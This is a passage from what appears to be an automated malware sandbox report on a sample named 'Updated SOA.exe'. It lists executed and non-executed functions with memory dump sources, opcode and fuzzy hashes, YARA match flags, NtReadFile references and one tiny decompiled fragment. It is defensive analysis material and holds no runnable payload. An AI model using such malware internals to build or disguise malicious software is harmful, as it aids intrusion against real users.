                                                                            Uniqueness Score: -1.00%

                                                                            Function 07737108, Relevance: .0, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 81e3a1e8c925c9be21b3bc227bb58b53864dddd29d6de8ef75ef2c923f2b1423
                                                                            • Instruction ID: d814f36e94334af4fb339469df00fb5756f989b7d5ea5d900982f0aeb62741d9
                                                                            • Opcode Fuzzy Hash: 81e3a1e8c925c9be21b3bc227bb58b53864dddd29d6de8ef75ef2c923f2b1423
                                                                            • Instruction Fuzzy Hash: 56E0C2F281A20CEBCB14EFB0D54569D77ADEB02145F504CA5C00993211DE300A008682
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07735060, Relevance: .0, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a747511901117753faaad6d48d703103a8f096158bc3d21806326f27dc90bf5a
                                                                            • Instruction ID: 6b705c8f599d6e1b531ad64762eeb8e2c15b9204522f78f1cb9f7ed7e474fed2
                                                                            • Opcode Fuzzy Hash: a747511901117753faaad6d48d703103a8f096158bc3d21806326f27dc90bf5a
                                                                            • Instruction Fuzzy Hash: CAE08CB281A20CEFC700DFB0D505AAD7BACEB06245F0048A9E40997151EE320A10CBC1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07736F10, Relevance: .0, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b89d25eb82ac9687e715374c599b1c9df105db862b72879b395d434cf0a3a84
                                                                            • Instruction ID: 0494c217b516b5282e65d4cc442d91a6f3eb500e82a6927f25c4941e42a3b157
                                                                            • Opcode Fuzzy Hash: 1b89d25eb82ac9687e715374c599b1c9df105db862b72879b395d434cf0a3a84
                                                                            • Instruction Fuzzy Hash: A2E0C2F281A20DEBC710EFB0D50869D7BFDEB02148F5089A59009D3111EE700A008A82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07738F60, Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 538be720a0ec6bf05af0d73af7f2678dacd8bf3aa6b193ec600e6418a6818a40
                                                                            • Instruction ID: cef983103db9b142141afd532e49d5f26cb8d71af28060e1997c58c3c7a643b9
                                                                            • Opcode Fuzzy Hash: 538be720a0ec6bf05af0d73af7f2678dacd8bf3aa6b193ec600e6418a6818a40
                                                                            • Instruction Fuzzy Hash: 73E0ECB196A20DEFC744EFB8E54669CBFB9AB19245F1040A9B808A3345EB305A41CA51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07736BE8, Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 46d299e85f5c071a906c84b03d26420c6fc408865d2ebd9a13e2eaf9c6ce9b28
                                                                            • Instruction ID: 35e4d4c34a96ba49e2f0f4726edadea84b7c111dc79bedfe9101a860b15d3ad9
                                                                            • Opcode Fuzzy Hash: 46d299e85f5c071a906c84b03d26420c6fc408865d2ebd9a13e2eaf9c6ce9b28
                                                                            • Instruction Fuzzy Hash: 97E0ECB096A30CEFC744EFB8D54A69DBFB8EB09245F1080A99808E3345EF305A44CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07736BA8, Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2fa2554c905c90d0a301952f35566147f09fd550226c4e02a93a35faaafc1fbd
                                                                            • Instruction ID: c7f7801bbfbbfc4f414fdc99e08c3ea2640d44d58c2799f92294d4773f5fb48d
                                                                            • Opcode Fuzzy Hash: 2fa2554c905c90d0a301952f35566147f09fd550226c4e02a93a35faaafc1fbd
                                                                            • Instruction Fuzzy Hash: CCE01274919208EBC704EFA4E58196CBB7DFB46305F20C5ADD84867345CB315E56CF85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773CA5C, Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2ff25f637703da39cfb7aaece5a1d3917ff9197932cd86c8c1dcefad44b5bb4
                                                                            • Instruction ID: 6293804cdbb0099e8fbdc8913a6ff89b96430df269b918867b78dcb65345b439
                                                                            • Opcode Fuzzy Hash: c2ff25f637703da39cfb7aaece5a1d3917ff9197932cd86c8c1dcefad44b5bb4
                                                                            • Instruction Fuzzy Hash: 05F0B2B092015ACFDB50DF64DA69B9CBBB5BB48300F0089AAA40BB7654DF341A84CF10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 077330A0, Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b21356779a342b00dc53e9e0f4551143fe261fa39b39924a0dc66d55df729451
                                                                            • Instruction ID: d8d161dd0ea7169cdceca586f05f402dfdccfbf460a2e0299255dda0b928fa6b
                                                                            • Opcode Fuzzy Hash: b21356779a342b00dc53e9e0f4551143fe261fa39b39924a0dc66d55df729451
                                                                            • Instruction Fuzzy Hash: 49E02633908550CFC720ABA8E3843903F719701321F064496D84A9F017C330CC80C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07734169, Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 997bde47e6b31d09437475601ccbbc27e47b70fbb8e4776e119c96056237c653
                                                                            • Instruction ID: 674c883f486bcb20163ee6fe02c13e52790bee59ab2b75a11649ac5a9245915a
                                                                            • Opcode Fuzzy Hash: 997bde47e6b31d09437475601ccbbc27e47b70fbb8e4776e119c96056237c653
                                                                            • Instruction Fuzzy Hash: 2ED0C777244248BFDB41BFE49805F973FADA709710F54E241F6484A512C171E852D791
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07732439, Relevance: .0, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bc9ab0255331dc6592f17a75b8622b4a800b51afd68cb2e3a633069a8c00b55f
                                                                            • Instruction ID: d1beab05b81f8f966f556a0744468f9e97f22731f9d73f14803a1b2b8fe75883
                                                                            • Opcode Fuzzy Hash: bc9ab0255331dc6592f17a75b8622b4a800b51afd68cb2e3a633069a8c00b55f
                                                                            • Instruction Fuzzy Hash: 2DD09E72544248BFCB416F90D800B697B75BF55750F249159F6440D121D7734522DB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07730E74, Relevance: .0, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4656819f9a357c3c0962c99b9478fafee28a1452bb38a3e04da3e9fc95bb2639
                                                                            • Instruction ID: c084309778986db550a14058d9ffe6d52eec0da51f15d5f361a8d06dd54e8eae
                                                                            • Opcode Fuzzy Hash: 4656819f9a357c3c0962c99b9478fafee28a1452bb38a3e04da3e9fc95bb2639
                                                                            • Instruction Fuzzy Hash: 91D0127229511CBBCB457A90DC04D5B7F1BFB15794F20C949F6040D122C773D962D791
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773C6F9, Relevance: .0, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76f45ca80fb1bf2bebea7686c2c13e4e79960deb840a5124b7763b26d2eb2aeb
                                                                            • Instruction ID: 5cc25838602ed9907bc616a128db8f825a774aceddfee60001b75435d1edab20
                                                                            • Opcode Fuzzy Hash: 76f45ca80fb1bf2bebea7686c2c13e4e79960deb840a5124b7763b26d2eb2aeb
                                                                            • Instruction Fuzzy Hash: BED05E74A10219CFDB51DF74DB4569E77B5FF42385F004C96E506E7294DBB40A808F11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07730BB8, Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b1a2505ae2e4266ea49d13b252fb5e4e773319a04d0998298e8dff55f4a62cd
                                                                            • Instruction ID: 6520a92e7c082c0b7d264ff1f8c862eeca5addbd86bab07557100d4119903b9c
                                                                            • Opcode Fuzzy Hash: 1b1a2505ae2e4266ea49d13b252fb5e4e773319a04d0998298e8dff55f4a62cd
                                                                            • Instruction Fuzzy Hash: 26B09B6135513417C915319DA4105EF718E8785668F41006BE50F977828DD55C4102EA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07734178, Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1803122f65edfba27739d172df04341dc9234fd1f0869e2076ea987ee97db24
                                                                            • Instruction ID: 9f7fe987fc9e260096b8a56315d7167d9ad46e305cadd31170c9f646b5555818
                                                                            • Opcode Fuzzy Hash: d1803122f65edfba27739d172df04341dc9234fd1f0869e2076ea987ee97db24
                                                                            • Instruction Fuzzy Hash: 01C01276240208BFDA40AA94C800D963BAAAB08A00F509200FA080A202C232E862DBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07737624, Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 148609153c6ecd6bd558c0dfcdc6eefc9a6e994026fdb7f36e899b568a8b7f89
                                                                            • Instruction ID: b90418e48856fb5276237adc1f5c0090c8b27be65ad1633cd4cf8d81810c333e
                                                                            • Opcode Fuzzy Hash: 148609153c6ecd6bd558c0dfcdc6eefc9a6e994026fdb7f36e899b568a8b7f89
                                                                            • Instruction Fuzzy Hash: 10C09BFD02505DEFC609A754C6D8CA9FAA6FF553447408C95E14D45131C731C424DB96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07737D0F, Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 287265d3f2027eda4814be1885828c212f2a139b330a519a3638b0691a4ab9be
                                                                            • Instruction ID: 2df1a0f97d7e0efc86e8b8a82ed300e33d764a478408d2227ee2019f29af353e
                                                                            • Opcode Fuzzy Hash: 287265d3f2027eda4814be1885828c212f2a139b330a519a3638b0691a4ab9be
                                                                            • Instruction Fuzzy Hash: ECC08C6900D0C0CFE70EAB208CA8F447FA0EB12108B0AC0CAC04806073C40A9018CF46
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 074FC230, Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 08f88501cbb9ca5b79e4f78d43a73f655f1512f473203af210a1eb1f7f8d8c67
                                                                            • Instruction ID: 4abfe82ab0e8e6e9183a0693e0a9e21a29d42be0e283bc8c68ec72a372fb6b81
                                                                            • Opcode Fuzzy Hash: 08f88501cbb9ca5b79e4f78d43a73f655f1512f473203af210a1eb1f7f8d8c67
                                                                            • Instruction Fuzzy Hash: 4C22C0B4E002198FDB14CFA9C985BEDBBF6FF88314F14816AE509AB255D7349981CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074F6D5B, Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /1O
                                                                            • API String ID: 0-1159016050
                                                                            • Opcode ID: 7e448a1ea80ba1e99169d9008606f448d0aa54213518d6ddb2c8604663d6e9f6
                                                                            • Instruction ID: df7cdafaa83d734816aaee7f594eb1c014f5388f0366bd77bb79ec600fc58b19
                                                                            • Opcode Fuzzy Hash: 7e448a1ea80ba1e99169d9008606f448d0aa54213518d6ddb2c8604663d6e9f6
                                                                            • Instruction Fuzzy Hash: 33A1CBB0E006289BDBA5DF69C984B8DBBF5FF48304F1181E9D098E6205EB319A95CF11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106F078, Relevance: .3, Instructions: 315COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3686d38698e7b3e607197cad65e9c7265987f621336368430db1a092ee96ba86
                                                                            • Instruction ID: 780e3ee0cbab0dc999aafe144a482fdf4225f30346a192b22d65c7a74852177b
                                                                            • Opcode Fuzzy Hash: 3686d38698e7b3e607197cad65e9c7265987f621336368430db1a092ee96ba86
                                                                            • Instruction Fuzzy Hash: 4412C3F1811746CBE330EF65F99C19BBBA1F745328B904228D2652BAD8D7B8114ACF84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773899F, Relevance: .3, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 80c7da9dc7c4454745e33a369b92127d2da40fc2c3644721b12ef92be4aa7718
                                                                            • Instruction ID: 0343674cadef0e1f2ce51c188057827fa05f0d2c2c76b187495f8cdd8d0417f8
                                                                            • Opcode Fuzzy Hash: 80c7da9dc7c4454745e33a369b92127d2da40fc2c3644721b12ef92be4aa7718
                                                                            • Instruction Fuzzy Hash: 2AD1F831C2074A8ACB00EFA4DA55A99B775FF95304F618B9AE1493B264EF706AC4CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106CC34, Relevance: .3, Instructions: 265COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 91a9291bd9fb3bb08391bc301554c8bd6045a7e87b72ed4d753faa7b74286b1d
                                                                            • Instruction ID: 7dde77da91622135cd363b3774e505afd7a1a2d56aea1fc4e5b0c43a055c3e12
                                                                            • Opcode Fuzzy Hash: 91a9291bd9fb3bb08391bc301554c8bd6045a7e87b72ed4d753faa7b74286b1d
                                                                            • Instruction Fuzzy Hash: 5DA19D36E0021ACFDF05DFB5C9445DEBBF6FF89300B1585AAE945AB225EB30A905CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 077389B0, Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d7580ed86b23091429494656dbd7267aaf6ad03b245ec5cb2ff2a86d2a8e19f
                                                                            • Instruction ID: 24cdd367e0315d138051fd0c66a43543dfa0b8bde31eac098c67d15b53413fa7
                                                                            • Opcode Fuzzy Hash: 5d7580ed86b23091429494656dbd7267aaf6ad03b245ec5cb2ff2a86d2a8e19f
                                                                            • Instruction Fuzzy Hash: 96D1E830C2075A8ACB10EFA4DA55A9DB775FF95304F618B9AE1093B264EF706AC4CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074FCD98, Relevance: .3, Instructions: 253COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 44a7778a24d1bac1164672a1176ea9d82cb1de5655be8e32673f9fdc6c6bf07e
                                                                            • Instruction ID: 6154ec7fe3b6892769c0e3d3f3b078334d10e50ff4f33e857ca60ee25e48aef2
                                                                            • Opcode Fuzzy Hash: 44a7778a24d1bac1164672a1176ea9d82cb1de5655be8e32673f9fdc6c6bf07e
                                                                            • Instruction Fuzzy Hash: AFA1D2B1E0420D8FDB14DFA9C585AEEFBF2BB89304F24852AD504AB345D73499468FA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 077354D0, Relevance: .2, Instructions: 243COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9147afc782f1895589c7186b962b684c57441525cdbe246a1734c7069bd28c91
                                                                            • Instruction ID: ab7c6a477500a454ef085aaa0ad2571dd5caa505f69424e126594a321ec36690
                                                                            • Opcode Fuzzy Hash: 9147afc782f1895589c7186b962b684c57441525cdbe246a1734c7069bd28c91
                                                                            • Instruction Fuzzy Hash: A3C175B5E016188FDB58CF6AC944ADDBBF2AF89305F14C0E9D409AB325DB305A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0106F077, Relevance: .2, Instructions: 217COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8fee59165c0639690c4926eddd0720bd282ee036298d603ad52b2eb559eb5113
                                                                            • Instruction ID: 803b419ac78b235bffc875114508809a28afab19df1f806514b1fba172f9319a
                                                                            • Opcode Fuzzy Hash: 8fee59165c0639690c4926eddd0720bd282ee036298d603ad52b2eb559eb5113
                                                                            • Instruction Fuzzy Hash: C0C118B1911746CAE720EF65F98C19ABBB1FB85328F614328D2616B6D8E7B41046CF84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07735099, Relevance: .2, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b53ccc2f7f79193fcf1fd1b91f74c06f2b9284f7b08b2c2baad4340c48203d63
                                                                            • Instruction ID: 68bb3abec36d34a89267cb4b0618c3881d67027682d75c441671c26f2a4c596f
                                                                            • Opcode Fuzzy Hash: b53ccc2f7f79193fcf1fd1b91f74c06f2b9284f7b08b2c2baad4340c48203d63
                                                                            • Instruction Fuzzy Hash: F4712070D106098FD748DFBAE64269EBBF7FB89304F14C86AD0059B26CEF7519068B51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 077350A8, Relevance: .2, Instructions: 164COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: faf7e2b8e4dd24b7cd23ab71a4d6122e9a2d56d95ec59f096676f5c088c97eee
                                                                            • Instruction ID: c88e66c01e08d574a4e7a716c84cb46045ef4b4582de9afef3abbbb135fd630b
                                                                            • Opcode Fuzzy Hash: faf7e2b8e4dd24b7cd23ab71a4d6122e9a2d56d95ec59f096676f5c088c97eee
                                                                            • Instruction Fuzzy Hash: 79612170E106098FD748DFBAE64269EBBF7FB85304F14C86AD0059B26CEF7519068B51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773CE98, Relevance: .2, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e5f45d4240e7963bd37d2cbc621f8e79de3e5dc30615553396156dea876bd299
                                                                            • Instruction ID: 4fa9a3996f4c84d20f4cec562a4fef2d082b55d905344f9787e0b876e044d4e7
                                                                            • Opcode Fuzzy Hash: e5f45d4240e7963bd37d2cbc621f8e79de3e5dc30615553396156dea876bd299
                                                                            • Instruction Fuzzy Hash: 6F516070E102198FD744EFB9EA4269E7BFAFF84304F14C92AE0059B369EF7459058B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0773CE8B, Relevance: .2, Instructions: 151COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a32a6f1a65578714100f1ecef8ff98987dbe44434efb6fb32a6142e95cdb5094
                                                                            • Instruction ID: 805dc7dc3fff42894a0c92b4ea0019f49edb0dd2682acb8e6092db5db0372719
                                                                            • Opcode Fuzzy Hash: a32a6f1a65578714100f1ecef8ff98987dbe44434efb6fb32a6142e95cdb5094
                                                                            • Instruction Fuzzy Hash: 85515F70E102198FD744EFB9EA426AE7BFAEF84304F14C92AE0059F368DF7459058B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074F6638, Relevance: .1, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d2e498ce1e203a135c77fc765d94890ccd9cbdd0131179d76de41e04efd6c76e
                                                                            • Instruction ID: 73cf758e160b76bc3054e71fd2906740030eaa27cc74028bff15d3a56d7711a7
                                                                            • Opcode Fuzzy Hash: d2e498ce1e203a135c77fc765d94890ccd9cbdd0131179d76de41e04efd6c76e
                                                                            • Instruction Fuzzy Hash: F1415DB1E116188BEB1DCF6B8D4179AFAF7BFC8200F54C1BAC90CA6254EB3406468F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 074F6628, Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1bdd42dcc172e67dc1ad35218b1cc19d54d7ab66b9b4323a9351e16fc179699
                                                                            • Instruction ID: 16033f484e342ea705e23cd5cc08a3ecada64f888ed4f529a21692edbaca98dd
                                                                            • Opcode Fuzzy Hash: c1bdd42dcc172e67dc1ad35218b1cc19d54d7ab66b9b4323a9351e16fc179699
                                                                            • Instruction Fuzzy Hash: 9A4143B1E116588BEB1DCF6B8D4169AFBF7AFC8300F14C5BA890CA6254DB3406468F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: Updated SOA.exe PID: 1968 Parent PID: 1380 Updated SOA.exeCOMMON

                                                                            Executed Functions

                                                                            Function 00418623, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: *9A
                                                                            • API String ID: 2738559852-3318015640
                                                                            • Opcode ID: 5b5ae100ddbca5d0afcf9688b1fc5f58017fee444e12436448ef003846f2f808
                                                                            • Instruction ID: 12fd63adb0fb678a40cbb9dbf4e4ef7841bd99cac4b8e234ccc6183831b054bd
                                                                            • Opcode Fuzzy Hash: 5b5ae100ddbca5d0afcf9688b1fc5f58017fee444e12436448ef003846f2f808
                                                                            • Instruction Fuzzy Hash: 5F1132B6200108AFCB08DFA9DC84DEB77ADEF8C350B148649FA5DD7241C634E8128BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041867A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55filenativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 68%
                                                                            			E0041867A(signed int __eax, void* __ebx, void* _a1, void* _a4, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a40) {
				signed int _v5;

				asm("aam 0xcb");
				_t1 =  &_v5;
				 *_t1 = _v5 & __eax;
				if ( *_t1 != 0) goto L4;
			}




                                                                            0x0041867a
                                                                            0x0041867c
                                                                            0x0041867c
                                                                            0x0041867f

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:A
                                                                            • API String ID: 2738559852-2859176346
                                                                            • Opcode ID: c08a8e6d134c8fbb7e10b0408200612589c7842e0deb7065763ff3f192f8c184
